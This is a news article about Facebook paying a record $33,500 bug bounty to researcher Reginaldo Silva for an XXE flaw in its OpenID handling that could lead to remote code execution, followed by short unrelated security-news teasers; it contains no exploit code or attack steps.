Facebook has announced that it has awarded $33,500 - their biggest bug bounty payout to date - to a Brazilian security researcher that discovered a remote code execution flaw affecting Facebook's servers.

Reginaldo Silva initially reported to the company his discovery of an XML external entities (XXE) vulnerability which would allow attackers to read arbitrary files on their webserver.

This was in November 2013, but he found the bug a year earlier while examining how Drupal handled OpenID. It took him a year to realize that it could affect other services using the popular authentication standard, and he began his testing.

Once he discovered that Facebook was also vulnerable, he submitted his findings and PoC exploit code to the company's security team.

"The report was well written and included proof of concept code, so we were able to reproduce the issue easily. After running the proof of concept to verify the issue, we filed an urgent task—triggering notifications to our on-call employees," the team explained in a post.

A short term fix was produced in less than four hours, and it was immediately deployed across the company's webservers. Silva was notified, but was disappointed: he believed that the bug could be escalated to a Remote Code Execution vulnerability, but was now unable to prove it.

"I decided to tell the security team what I'd do to escalate my access and trust them to be honest when they tested to see if the attack I had in my mind worked or not," he wrote. "I'm glad I did that. After a few back and forth emails, the security team confirmed that my attack was sound and that I had indeed found a RCE affecting their servers.

"We knew we wanted to pay out a lot because of the severity of the issue, so we decided to average the payout recommendations across a group of our program administrators," the team concluded and, after having received permission from Silva, shared the amount of the prize he received with the public.

Spotlight

Microsoft Edge, the new browser in Windows 10, represents a significant increase in the security over Internet Explorer. However, there are also new potential threat vectors that aren’t present in older versions.

35 percent of employees would sell information on company patents, financial records and customer credit card details if the price was right. This illustrates the growing importance for organizations to deploy data loss prevention strategies.

Sun Tzu's writings have been studied throughout the ages by professional militaries and can used to not only answer the question of whether or not we are in a cyberwar, but how one can fight a cyber-battle.

Infosec consultant Paul Moore came up with a working solution to thwart a type of behavioral profiling. The result is a Chrome extension called Keyboard Privacy, which prevents profiling of users by the way they type by randomizing the rate at which characters reach the DOM.